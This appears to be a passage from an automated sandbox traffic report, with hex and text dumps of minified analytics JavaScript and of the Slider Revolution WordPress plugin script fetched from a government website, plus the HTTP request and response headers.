                                                                                                                        2025-01-10 13:54:51 UTC8168INData Raw: 28 62 2c 66 2c 64 29 3b 65 2e 6f 6e 6c 6f 61 64 3d 79 28 62 2c 66 2c 63 29 3b 79 64 28 61 29 26 26 28 61 3d 65 63 28 61 29 2c 41 28 65 2e 73 74 79 6c 65 2c 7b 70 6f 73 69 74 69 6f 6e 3a 22 61 62 73 6f 6c 75 74 65 22 2c 76 69 73 69 62 69 6c 69 74 79 3a 22 68 69 64 64 65 6e 22 2c 77 69 64 74 68 3a 22 30 70 78 22 2c 68 65 69 67 68 74 3a 22 30 70 78 22 7d 29 2c 61 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 46 65 28 61 2c 62 29 7b 76 61 72 20 63 3d 62 2e 73 70 6c 69 74 28 22 2e 22 29 2c 64 3d 63 2e 70 6f 70 28 29 3b 63 3d 63 2e 6c 65 6e 67 74 68 3f 6e 28 61 2c 51 28 22 2e 22 2c 63 29 29 3a 61 3b 69 66 28 21 63 29 74 68 72 6f 77 20 5a 28 22 6e 6f 6d 61 22 29 3b 72 65 74 75 72 6e 7b 76 61 6c 75 65 3a 6e 28 63 2c 64 29 2c 70 61
                                                                                                                        Data Ascii: (b,f,d);e.onload=y(b,f,c);yd(a)&&(a=ec(a),A(e.style,{position:"absolute",visibility:"hidden",width:"0px",height:"0px"}),a.appendChild(e))}function Fe(a,b){var c=b.split("."),d=c.pop();c=c.length?n(a,Q(".",c)):a;if(!c)throw Z("noma");return{value:n(c,d),pa
                                                                                                                        2025-01-10 13:54:51 UTC8168INData Raw: 6f 6e 20 66 28 29 7b 67 2e 73 74 61 74 65 3d 32 3b 64 26 26 64 28 29 7d 76 61 72 20 67 3d 62 6f 28 61 2c 62 29 3b 62 3d 67 2e 48 69 3b 76 61 72 20 68 3d 67 2e 73 74 61 74 65 3b 62 26 26 32 21 3d 3d 68 3f 31 3d 3d 3d 68 3f 65 28 29 3a 28 61 3d 6f 61 28 61 29 2c 61 2e 46 28 62 2c 5b 22 6c 6f 61 64 22 5d 2c 65 29 2c 61 2e 46 28 62 2c 5b 22 65 72 72 6f 72 22 5d 2c 66 29 29 3a 66 28 29 7d 66 75 6e 63 74 69 6f 6e 20 62 6f 28 61 2c 62 29 7b 59 66 5b 62 5d 7c 7c 28 59 66 5b 62 5d 3d 7b 48 69 3a 4b 65 28 61 2c 7b 73 72 63 3a 62 7d 29 2c 73 74 61 74 65 3a 30 7d 29 3b 72 65 74 75 72 6e 20 59 66 5b 62 5d 7d 66 75 6e 63 74 69 6f 6e 20 63 6f 28 61 2c 62 2c 63 2c 64 29 7b 69 66 28 21 63 2e 4b 7c 7c 41 65 28 62 2e 63 61 29 29 64 28 29 3b 65 6c 73 65 7b 76 61 72 20 65 3d
                                                                                                                        Data Ascii: on f(){g.state=2;d&&d()}var g=bo(a,b);b=g.Hi;var h=g.state;b&&2!==h?1===h?e():(a=oa(a),a.F(b,["load"],e),a.F(b,["error"],f)):f()}function bo(a,b){Yf[b]||(Yf[b]={Hi:Ke(a,{src:b}),state:0});return Yf[b]}function co(a,b,c,d){if(!c.K||Ae(b.ca))d();else{var e=
                                                                                                                        2025-01-10 13:54:51 UTC8168INData Raw: 28 61 2c 56 65 2c 22 69 73 70 22 29 29 7b 76 61 72 20 66 3d 42 2c 67 3d 66 75 6e 63 74 69 6f 6e 28 68 2c 6b 29 7b 22 31 22 3d 3d 3d 68 3f 64 28 7b 47 61 3a 6b 2c 4a 65 3a 30 7d 29 3a 65 28 29 3b 66 28 29 3b 55 69 28 56 65 2c 22 69 73 70 22 29 7d 3b 66 3d 6f 61 28 61 29 2e 46 28 61 2c 5b 22 6d 65 73 73 61 67 65 22 5d 2c 46 28 5b 62 2c 63 2c 67 5d 2c 43 28 61 2c 22 69 73 70 2e 73 74 61 74 2e 6d 22 2c 4c 6f 29 29 29 3b 58 28 61 2c 67 2c 31 35 30 30 29 7d 65 6c 73 65 20 65 28 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 4c 6f 28 61 2c 62 2c 63 2c 64 29 7b 76 61 72 20 65 3d 64 2e 64 61 74 61 3b 69 66 28 4e 28 65 29 29 7b 76 61 72 20 66 3d 75 28 65 2e 73 70 6c 69 74 28 22 2a 22 29 29 3b 65 3d 66 2e 6e 65 78 74 28 29 2e 76 61 6c 75 65 3b 76 61 72 20 67 3d 66 2e 6e 65
                                                                                                                        Data Ascii: (a,Ve,"isp")){var f=B,g=function(h,k){"1"===h?d({Ga:k,Je:0}):e();f();Ui(Ve,"isp")};f=oa(a).F(a,["message"],F([b,c,g],C(a,"isp.stat.m",Lo)));X(a,g,1500)}else e()})}function Lo(a,b,c,d){var e=d.data;if(N(e)){var f=u(e.split("*"));e=f.next().value;var g=f.ne
                                                                                                                        2025-01-10 13:54:51 UTC8168INData Raw: 61 2e 46 63 3d 61 2e 4c 2e 4a 28 61 2e 46 63 2c 22 69 69 22 29 3b 61 2e 47 63 3d 61 2e 4c 2e 4a 28 61 2e 47 63 2c 22 69 72 22 29 3b 61 2e 4f 63 3d 61 2e 4c 2e 4a 28 61 2e 4f 63 2c 22 72 69 22 29 3b 61 2e 58 63 3d 61 2e 4c 2e 4a 28 61 2e 58 63 2c 22 75 72 22 29 3b 61 2e 4a 64 3d 61 2e 4c 2e 4a 28 61 2e 4a 64 2c 22 63 65 22 29 3b 61 2e 77 63 3d 61 2e 4c 2e 4a 28 61 2e 77 63 2c 22 76 63 22 29 3b 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 76 62 28 61 2c 62 29 7b 76 61 72 20 63 3d 74 68 69 73 3b 74 68 69 73 2e 6e 63 3d 5b 5d 3b 74 68 69 73 2e 67 62 3d 5b 5d 3b 74 68 69 73 2e 63 65 3d 31 3b 74 68 69 73 2e 53 65 3d 74 68 69 73 2e 61 67 3d 30 3b 74 68 69 73 2e 42 61 3d 7b 7d 3b 74 68 69 73 2e 53 61 3d 7b 7d 3b 74 68 69 73 2e 48 62 3d 5b 5d 3b 74 68 69
                                                                                                                        Data Ascii: a.Fc=a.L.J(a.Fc,"ii");a.Gc=a.L.J(a.Gc,"ir");a.Oc=a.L.J(a.Oc,"ri");a.Xc=a.L.J(a.Xc,"ur");a.Jd=a.L.J(a.Jd,"ce");a.wc=a.L.J(a.wc,"vc");return a}function vb(a,b){var c=this;this.nc=[];this.gb=[];this.ce=1;this.Se=this.ag=0;this.Ba={};this.Sa={};this.Hb=[];thi
                                                                                                                        2025-01-10 13:54:51 UTC8168INData Raw: 63 22 2c 6e 65 77 20 52 65 67 45 78 70 28 22 73 63 68 65 6d 61 2e 6f 72 67 5c 5c 2f 28 22 2b 51 28 22 7c 22 2c 6c 61 28 61 2e 47 65 29 29 2b 22 29 24 22 29 29 3b 76 61 72 20 62 3d 7b 7d 3b 61 2e 47 62 3d 28 62 2e 69 64 3d 66 75 6e 63 74 69 6f 6e 28 63 29 7b 63 3d 63 2e 65 6c 65 6d 65 6e 74 3b 76 61 72 20 64 3d 6e 62 28 74 68 69 73 2e 6c 2c 63 2c 22 69 64 65 6e 74 69 66 69 65 72 22 29 3b 72 65 74 75 72 6e 20 64 3f 6b 62 28 64 29 3a 28 64 3d 6e 62 28 74 68 69 73 2e 6c 2c 63 2c 22 6d 61 69 6e 45 6e 74 69 74 79 4f 66 50 61 67 65 22 29 29 26 26 64 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 74 65 6d 69 64 22 29 3f 64 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 74 65 6d 69 64 22 29 3a 6e 75 6c 6c 7d 2c 62 2e 63 68 61 72 73 3d 66 75 6e 63 74 69 6f 6e 28
                                                                                                                        Data Ascii: c",new RegExp("schema.org\\/("+Q("|",la(a.Ge))+")$"));var b={};a.Gb=(b.id=function(c){c=c.element;var d=nb(this.l,c,"identifier");return d?kb(d):(d=nb(this.l,c,"mainEntityOfPage"))&&d.getAttribute("itemid")?d.getAttribute("itemid"):null},b.chars=function(
                                                                                                                        2025-01-10 13:54:51 UTC8168INData Raw: 70 5d 2c 5b 37 38 34 2c 61 2e 73 63 72 6f 6c 6c 45 76 65 6e 74 2c 4b 70 5d 2c 5b 37 32 30 2c 61 2e 6d 6f 75 73 65 45 76 65 6e 74 2c 4c 70 5d 2c 5b 36 35 36 2c 61 2e 47 6a 2c 4d 70 5d 2c 5b 35 39 32 2c 61 2e 70 61 67 65 2c 4e 70 5d 2c 5b 35 31 33 2c 61 2e 65 6e 64 2c 5a 63 5d 2c 5b 34 34 39 2c 61 2e 70 61 72 74 4e 75 6d 2c 63 61 5d 2c 5b 34 30 31 2c 61 2e 63 68 75 6e 6b 2c 4f 70 5d 2c 5b 32 35 37 2c 61 2e 66 72 61 6d 65 49 64 2c 77 61 5d 2c 5b 31 39 33 2c 61 2e 65 76 65 6e 74 2c 63 61 5d 2c 5b 31 32 39 2c 61 2e 74 79 70 65 2c 63 61 5d 2c 5b 36 35 2c 61 2e 73 74 61 6d 70 2c 63 61 5d 5d 7d 66 75 6e 63 74 69 6f 6e 20 50 70 28 61 29 7b 72 65 74 75 72 6e 5b 5b 38 34 2c 0a 61 2e 45 69 2c 72 6a 5d 5d 7d 66 75 6e 63 74 69 6f 6e 20 51 70 28 61 29 7b 72 65 74 75 72
                                                                                                                        Data Ascii: p],[784,a.scrollEvent,Kp],[720,a.mouseEvent,Lp],[656,a.Gj,Mp],[592,a.page,Np],[513,a.end,Zc],[449,a.partNum,ca],[401,a.chunk,Op],[257,a.frameId,wa],[193,a.event,ca],[129,a.type,ca],[65,a.stamp,ca]]}function Pp(a){return[[84,a.Ei,rj]]}function Qp(a){retur
                                                                                                                        2025-01-10 13:54:51 UTC8168INData Raw: 65 62 4f 53 2e 73 65 72 76 69 63 65 2e 72 65 71 75 65 73 74 22 29 3b 72 65 74 75 72 6e 20 53 28 62 29 3f 6e 65 77 20 4c 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 76 61 72 20 64 3d 7b 7d 2c 65 3d 7b 7d 3b 62 28 22 6c 75 6e 61 3a 2f 2f 63 6f 6d 2e 77 65 62 6f 73 2e 73 65 72 76 69 63 65 2e 73 6d 22 2c 28 65 2e 6d 65 74 68 6f 64 3d 22 64 65 76 69 63 65 69 64 2f 67 65 74 49 44 73 22 2c 65 2e 70 61 72 61 6d 65 74 65 72 73 3d 0a 28 64 2e 69 64 54 79 70 65 3d 5b 22 4c 47 55 44 49 44 22 5d 2c 64 29 2c 65 2e 6f 6e 53 75 63 63 65 73 73 3d 66 75 6e 63 74 69 6f 6e 28 66 29 7b 63 28 59 64 28 6e 28 66 2c 22 69 64 4c 69 73 74 2e 30 2e 69 64 56 61 6c 75 65 22 29 29 29 7d 2c 65 29 29 7d 29 3a 4c 2e 72 65 73 6f 6c 76 65 28 6e 75 6c 6c 29 7d 66 75 6e 63 74 69 6f 6e 20 49 71 28
                                                                                                                        Data Ascii: ebOS.service.request");return S(b)?new L(function(c){var d={},e={};b("luna://com.webos.service.sm",(e.method="deviceid/getIDs",e.parameters=(d.idType=["LGUDID"],d),e.onSuccess=function(f){c(Yd(n(f,"idList.0.idValue")))},e))}):L.resolve(null)}function Iq(
                                                                                                                        2025-01-10 13:54:51 UTC8168INData Raw: 6b 6c 69 6e 6b 22 2c 63 29 29 7b 76 61 72 20 64 3d 61 2e 6c 2c 65 3d 61 2e 59 67 2c 66 3d 61 2e 66 62 2c 67 3d 61 2e 73 65 6e 64 65 72 2c 68 3d 61 2e 6d 68 2c 6b 3d 66 2e 72 63 2c 6c 3d 63 2e 68 72 65 66 3b 76 61 72 20 6d 3d 62 62 28 63 2e 69 6e 6e 65 72 48 54 4d 4c 26 26 63 2e 69 6e 6e 65 72 48 54 4d 4c 2e 72 65 70 6c 61 63 65 28 2f 3c 5c 2f 3f 5b 5e 3e 5d 2b 3e 2f 67 69 2c 0a 22 22 29 29 3b 6d 7c 7c 28 6d 3d 28 6d 3d 63 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 69 6d 67 22 29 29 3f 62 62 28 6d 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 74 69 74 6c 65 22 29 7c 7c 6d 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 61 6c 74 22 29 29 3a 22 22 29 3b 6d 3d 6c 3d 3d 3d 6d 3f 22 22 3a 6d 3b 76 61 72 20 70 3d 6e 28 62 2c 22 69 73 54 72 75 73 74 65 64 22 29
                                                                                                                        Data Ascii: klink",c)){var d=a.l,e=a.Yg,f=a.fb,g=a.sender,h=a.mh,k=f.rc,l=c.href;var m=bb(c.innerHTML&&c.innerHTML.replace(/<\/?[^>]+>/gi,""));m||(m=(m=c.querySelector("img"))?bb(m.getAttribute("title")||m.getAttribute("alt")):"");m=l===m?"":m;var p=n(b,"isTrusted")


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        63192.168.2.74986369.163.179.334432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:50 UTC680OUTGET /wp-content/plugins/revslider/public/assets/js/rs6.min.js?ver=6.6.13 HTTP/1.1
                                                                                                                        Host: www.lpb.gov.lr
                                                                                                                        Connection: keep-alive
                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                        Accept: */*
                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                        Referer: https://www.lpb.gov.lr/
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Cookie: cjs_id=c3cd61e3-4cc5-4bd9-93ea-9fcc444fd5fe; _ym_uid=1736517288271535202; _ym_d=1736517288
                                                                                                                        2025-01-10 13:54:50 UTC371INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:50 GMT
                                                                                                                        Server: Apache
                                                                                                                        Upgrade: h2
                                                                                                                        Connection: Upgrade, close
                                                                                                                        Last-Modified: Wed, 10 Jan 2024 09:26:19 GMT
                                                                                                                        ETag: "654bf-60e94060dc9d4"
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Content-Length: 414911
                                                                                                                        Cache-Control: max-age=2592000
                                                                                                                        Expires: Sun, 09 Feb 2025 13:54:50 GMT
                                                                                                                        Vary: Accept-Encoding,User-Agent
                                                                                                                        Content-Type: text/javascript
                                                                                                                        2025-01-10 13:54:50 UTC7821INData Raw: 2f 2a 21 0a 0a 20 20 2d 20 53 6c 69 64 65 72 20 52 65 76 6f 6c 75 74 69 6f 6e 20 4a 61 76 61 53 63 72 69 70 74 20 50 6c 75 67 69 6e 20 2d 0a 0a 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 78 58 58 58 58 58 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 0a 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 20 78 58 58 58 58 58 2e 2e 78 58 58 58 58 58 2e 2e 78 58 58 58 58 58 2e 2e 2e 2e 2e 2e 2e 2e 2e 0a 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 78 58 58 58 58 58 2e 2e 78 58 58 58 58 58 2e 2e 78 58 58 58 58 58 2e 2e 2e 2e 2e 2e 2e 2e 2e 0a 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 78 58 58 58 58 58 2e 2e 78 58 58 58 58 58 2e 2e 78 58 58 58 58 58 2e 2e 78 58 58 58 58 58 2e 2e 2e 2e 2e 2e 2e 2e 2e 0a 2e 2e 2e 2e 2e 2e 2e
                                                                                                                        Data Ascii: /*! - Slider Revolution JavaScript Plugin -..........................xXXXXX.................................. xXXXXX..xXXXXX..xXXXXX...........................xXXXXX..xXXXXX..xXXXXX...................xXXXXX..xXXXXX..xXXXXX..xXXXXX................
                                                                                                                        2025-01-10 13:54:50 UTC8000INData Raw: 6e 70 61 75 73 65 3d 21 30 2c 69 2e 74 72 69 67 67 65 72 28 22 73 74 6f 70 74 69 6d 65 72 22 29 29 7d 29 7d 2c 72 65 76 72 65 73 75 6d 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 61 5b 74 68 69 73 2e 69 64 5d 21 3d 3d 74 29 7b 76 61 72 20 69 3d 65 28 74 68 69 73 29 3b 69 2e 64 61 74 61 28 22 63 6f 6e 74 68 6f 76 65 72 22 2c 30 29 2c 69 2e 64 61 74 61 28 22 63 6f 6e 74 68 6f 76 65 72 63 68 61 6e 67 65 64 22 2c 31 29 2c 69 2e 74 72 69 67 67 65 72 28 22 72 65 76 6f 6c 75 74 69 6f 6e 2e 73 6c 69 64 65 2e 6f 6e 72 65 73 75 6d 65 22 29 2c 61 5b 74 68 69 73 2e 69 64 5d 2e 74 6f 6e 70 61 75 73 65 3d 21 31 2c 69 2e 74 72 69 67 67 65 72 28 22 73 74 61 72 74 74 69 6d 65 72 22 29
                                                                                                                        Data Ascii: npause=!0,i.trigger("stoptimer"))})},revresume:function(){return this.each(function(){if(a[this.id]!==t){var i=e(this);i.data("conthover",0),i.data("conthoverchanged",1),i.trigger("revolution.slide.onresume"),a[this.id].tonpause=!1,i.trigger("starttimer")
                                                                                                                        2025-01-10 13:54:50 UTC8000INData Raw: 30 5d 2e 67 65 74 42 6f 75 6e 64 69 6e 67 43 6c 69 65 6e 74 52 65 63 74 28 29 3a 30 3d 3d 3d 61 5b 65 5d 2e 63 61 6e 76 2e 68 65 69 67 68 74 3f 61 5b 65 5d 2e 63 70 61 72 5b 30 5d 2e 67 65 74 42 6f 75 6e 64 69 6e 67 43 6c 69 65 6e 74 52 65 63 74 28 29 3a 61 5b 65 5d 2e 63 5b 30 5d 2e 67 65 74 42 6f 75 6e 64 69 6e 67 43 6c 69 65 6e 74 52 65 63 74 28 29 2c 6e 3d 61 2e 49 53 4d 3f 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 48 65 69 67 68 74 3a 61 2e 6c 61 73 74 77 69 6e 64 6f 77 68 65 69 67 68 74 3b 73 2e 68 68 65 69 67 68 74 3d 30 3d 3d 3d 73 2e 68 65 69 67 68 74 3f 30 3d 3d 3d 61 5b 65 5d 2e 63 61 6e 76 2e 68 65 69 67 68 74 3f 61 5b 65 5d 2e 6d 6f 64 75 6c 65 2e 68 65 69 67 68 74 3a 61 5b 65 5d 2e 63 61 6e 76 2e 68 65 69 67 68 74 3a 73 2e 68 65 69 67 68 74 2c 61
                                                                                                                        Data Ascii: 0].getBoundingClientRect():0===a[e].canv.height?a[e].cpar[0].getBoundingClientRect():a[e].c[0].getBoundingClientRect(),n=a.ISM?window.innerHeight:a.lastwindowheight;s.hheight=0===s.height?0===a[e].canv.height?a[e].module.height:a[e].canv.height:s.height,a
                                                                                                                        2025-01-10 13:54:50 UTC8000INData Raw: 5b 69 5d 2e 6d 6f 64 61 6c 2e 69 73 4c 69 76 65 3d 21 30 2c 72 2e 73 6c 69 64 65 3d 72 2e 73 6c 69 64 65 3d 3d 3d 74 3f 22 74 6f 30 22 3a 72 2e 73 6c 69 64 65 2c 61 5b 69 5d 2e 6d 6f 64 61 6c 2e 62 6f 64 79 63 6c 61 73 73 21 3d 3d 74 26 26 61 5b 69 5d 2e 6d 6f 64 61 6c 2e 62 6f 64 79 63 6c 61 73 73 2e 6c 65 6e 67 74 68 3e 3d 30 26 26 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 61 5b 69 5d 2e 6d 6f 64 61 6c 2e 62 6f 64 79 63 6c 61 73 73 29 2c 61 5b 69 5d 2e 6d 6f 64 61 6c 2e 62 67 2e 61 74 74 72 28 22 64 61 74 61 2d 72 69 64 22 2c 69 29 2c 74 70 47 53 2e 67 73 61 70 2e 74 6f 28 61 5b 69 5d 2e 6d 6f 64 61 6c 2e 62 67 2c 61 5b 69 5d 2e 6d 6f 64 61 6c 2e 63 6f 76 65 72 53 70 65 65 64 2c 7b 64 69 73 70 6c 61 79 3a 22 62
                                                                                                                        Data Ascii: [i].modal.isLive=!0,r.slide=r.slide===t?"to0":r.slide,a[i].modal.bodyclass!==t&&a[i].modal.bodyclass.length>=0&&document.body.classList.add(a[i].modal.bodyclass),a[i].modal.bg.attr("data-rid",i),tpGS.gsap.to(a[i].modal.bg,a[i].modal.coverSpeed,{display:"b
                                                                                                                        2025-01-10 13:54:50 UTC8000INData Raw: 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 73 72 63 3d 3d 3d 68 7d 29 2e 6c 65 6e 67 74 68 26 26 61 5b 72 5d 2e 6c 6f 61 64 71 75 65 75 65 2e 70 75 73 68 28 7b 73 72 63 3a 68 2c 69 6d 67 3a 63 5b 6c 5d 2c 69 6e 64 65 78 3a 6c 2c 73 74 61 72 74 74 6f 6c 6f 61 64 3a 44 61 74 65 2e 6e 6f 77 28 29 2c 74 79 70 65 3a 6d 7c 7c 22 69 6d 67 22 2c 70 72 69 6f 3a 6f 2c 70 72 6f 67 72 65 73 73 3a 63 5b 6c 5d 2e 63 6f 6d 70 6c 65 74 65 26 26 68 3d 3d 3d 63 5b 6c 5d 2e 73 72 63 3f 22 6c 6f 61 64 65 64 22 3a 22 70 72 65 70 61 72 65 64 22 2c 73 74 61 74 69 63 3a 73 2c 77 69 64 74 68 3a 63 5b 6c 5d 2e 63 6f 6d 70 6c 65 74 65 26 26 68 3d 3d 3d 63 5b 6c 5d 2e 73 72 63 3f 63 5b 6c 5d 2e 77 69 64 74 68 3a 74 2c 68 65 69 67 68 74 3a 63
                                                                                                                        Data Ascii: filter(function(e){return e.src===h}).length&&a[r].loadqueue.push({src:h,img:c[l],index:l,starttoload:Date.now(),type:m||"img",prio:o,progress:c[l].complete&&h===c[l].src?"loaded":"prepared",static:s,width:c[l].complete&&h===c[l].src?c[l].width:t,height:c
                                                                                                                        2025-01-10 13:54:50 UTC8000INData Raw: 65 2e 73 74 79 6c 65 2e 63 73 73 54 65 78 74 3d 22 62 61 63 6b 64 72 6f 70 2d 66 69 6c 74 65 72 3a 20 62 6c 75 72 28 32 70 78 29 22 2c 69 3d 30 21 3d 65 2e 73 74 79 6c 65 2e 6c 65 6e 67 74 68 29 2c 65 3d 6e 75 6c 6c 2c 61 2e 75 73 65 42 61 63 6b 64 72 6f 70 3d 69 26 26 72 7d 2c 64 65 65 70 4c 69 6e 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 69 29 7b 69 66 28 69 21 3d 3d 74 29 7b 76 61 72 20 72 3d 70 61 72 73 65 49 6e 74 28 69 2e 74 6f 53 74 72 69 6e 67 28 29 2e 72 65 70 6c 61 63 65 28 2f 5e 73 6c 69 64 65 2f 2c 22 22 29 2e 72 65 70 6c 61 63 65 28 22 2d 22 2c 22 22 29 2c 31 30 29 3b 69 66 28 69 73 4e 61 4e 28 72 29 29 66 6f 72 28 76 61 72 20 6f 20 69 6e 20 61 5b 65 5d 2e 73 6c 69 64 65 73 29 69 66 28 61 5b 65 5d 2e 73 6c 69 64 65 73 2e 68 61 73 4f 77 6e 50 72
                                                                                                                        Data Ascii: e.style.cssText="backdrop-filter: blur(2px)",i=0!=e.style.length),e=null,a.useBackdrop=i&&r},deepLink:function(e,i){if(i!==t){var r=parseInt(i.toString().replace(/^slide/,"").replace("-",""),10);if(isNaN(r))for(var o in a[e].slides)if(a[e].slides.hasOwnPr
                                                                                                                        2025-01-10 13:54:50 UTC8000INData Raw: 6e 76 2e 77 69 64 74 68 2c 22 61 75 74 6f 22 3d 3d 3d 61 5b 65 5d 2e 73 6c 69 64 65 72 4c 61 79 6f 75 74 26 26 28 61 5b 65 5d 2e 64 72 61 77 55 70 64 61 74 65 73 2e 63 2e 6c 65 66 74 3d 61 5b 65 5d 2e 6f 75 74 4e 61 76 44 69 6d 73 2e 6c 65 66 74 29 2c 61 5b 65 5d 2e 64 72 61 77 55 70 64 61 74 65 73 2e 63 21 3d 3d 61 5b 65 5d 2e 65 6d 70 74 79 4f 62 6a 65 63 74 26 26 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 61 5b 65 5d 2e 64 72 61 77 55 70 64 61 74 65 73 2e 63 29 21 3d 3d 61 5b 65 5d 2e 63 61 63 68 65 73 2e 73 65 74 73 69 7a 65 43 4f 42 4a 26 26 28 61 5b 65 5d 2e 63 61 63 68 65 73 2e 73 65 74 73 69 7a 65 43 4f 42 4a 3d 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 61 5b 65 5d 2e 64 72 61 77 55 70 64 61 74 65 73 2e 63 29 2c 6c 3d 21 30 2c 61 5b 65 5d 2e
                                                                                                                        Data Ascii: nv.width,"auto"===a[e].sliderLayout&&(a[e].drawUpdates.c.left=a[e].outNavDims.left),a[e].drawUpdates.c!==a[e].emptyObject&&JSON.stringify(a[e].drawUpdates.c)!==a[e].caches.setsizeCOBJ&&(a[e].caches.setsizeCOBJ=JSON.stringify(a[e].drawUpdates.c),l=!0,a[e].
                                                                                                                        2025-01-10 13:54:50 UTC8000INData Raw: 3d 22 72 67 62 61 28 22 2b 70 61 72 73 65 49 6e 74 28 63 2e 73 75 62 73 74 72 69 6e 67 28 30 2c 32 29 2c 31 36 29 2b 22 2c 20 22 2b 70 61 72 73 65 49 6e 74 28 63 2e 73 75 62 73 74 72 69 6e 67 28 32 2c 34 29 2c 31 36 29 2b 22 2c 20 22 2b 70 61 72 73 65 49 6e 74 28 63 2e 73 75 62 73 74 72 69 6e 67 28 34 2c 36 29 2c 31 36 29 2b 22 2c 20 22 29 3a 2d 31 21 3d 3d 72 2e 73 65 61 72 63 68 28 22 72 67 62 22 29 26 26 28 63 3d 72 2e 73 75 62 73 74 72 69 6e 67 28 72 2e 69 6e 64 65 78 4f 66 28 22 28 22 29 2b 31 2c 72 2e 6c 61 73 74 49 6e 64 65 78 4f 66 28 22 29 22 29 29 2e 73 70 6c 69 74 28 22 2c 22 29 29 2e 6c 65 6e 67 74 68 3e 32 26 26 28 63 3d 22 72 67 62 61 28 22 2b 63 5b 30 5d 2e 74 72 69 6d 28 29 2b 22 2c 20 22 2b 63 5b 31 5d 2e 74 72 69 6d 28 29 2b 22 2c 20 22
                                                                                                                        Data Ascii: ="rgba("+parseInt(c.substring(0,2),16)+", "+parseInt(c.substring(2,4),16)+", "+parseInt(c.substring(4,6),16)+", "):-1!==r.search("rgb")&&(c=r.substring(r.indexOf("(")+1,r.lastIndexOf(")")).split(",")).length>2&&(c="rgba("+c[0].trim()+", "+c[1].trim()+", "
                                                                                                                        2025-01-10 13:54:50 UTC8000INData Raw: 6e 64 28 27 3c 61 20 63 6c 61 73 73 3d 22 72 73 2d 6c 61 79 65 72 20 73 6c 69 64 65 6c 69 6e 6b 22 20 69 64 3d 22 72 73 5f 73 6c 69 64 65 6c 69 6e 6b 5f 27 2b 4d 61 74 68 2e 72 6f 75 6e 64 28 31 65 35 2a 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 29 2b 27 22 20 64 61 74 61 2d 7a 69 6e 64 65 78 3d 22 27 2b 28 22 62 61 63 6b 22 3d 3d 3d 53 3f 30 3a 22 66 72 6f 6e 74 22 3d 3d 3d 53 3f 39 35 3a 53 21 3d 3d 74 3f 70 61 72 73 65 49 6e 74 28 53 2c 30 29 3a 31 30 30 29 2b 27 22 20 64 61 74 61 78 79 3d 22 78 3a 63 3b 79 3a 63 22 20 64 61 74 61 2d 64 69 6d 3d 22 77 3a 31 30 30 25 3b 68 3a 31 30 30 25 22 20 64 61 74 61 2d 62 61 73 65 61 6c 69 67 6e 3d 22 73 6c 69 64 65 22 20 68 72 65 66 3d 22 27 2b 62 2b 27 22 20 74 61 72 67 65 74 3d 22 27 2b 28 61 2e 67 41 28 63 2c 22
                                                                                                                        Data Ascii: nd('<a class="rs-layer slidelink" id="rs_slidelink_'+Math.round(1e5*Math.random())+'" data-zindex="'+("back"===S?0:"front"===S?95:S!==t?parseInt(S,0):100)+'" dataxy="x:c;y:c" data-dim="w:100%;h:100%" data-basealign="slide" href="'+b+'" target="'+(a.gA(c,"
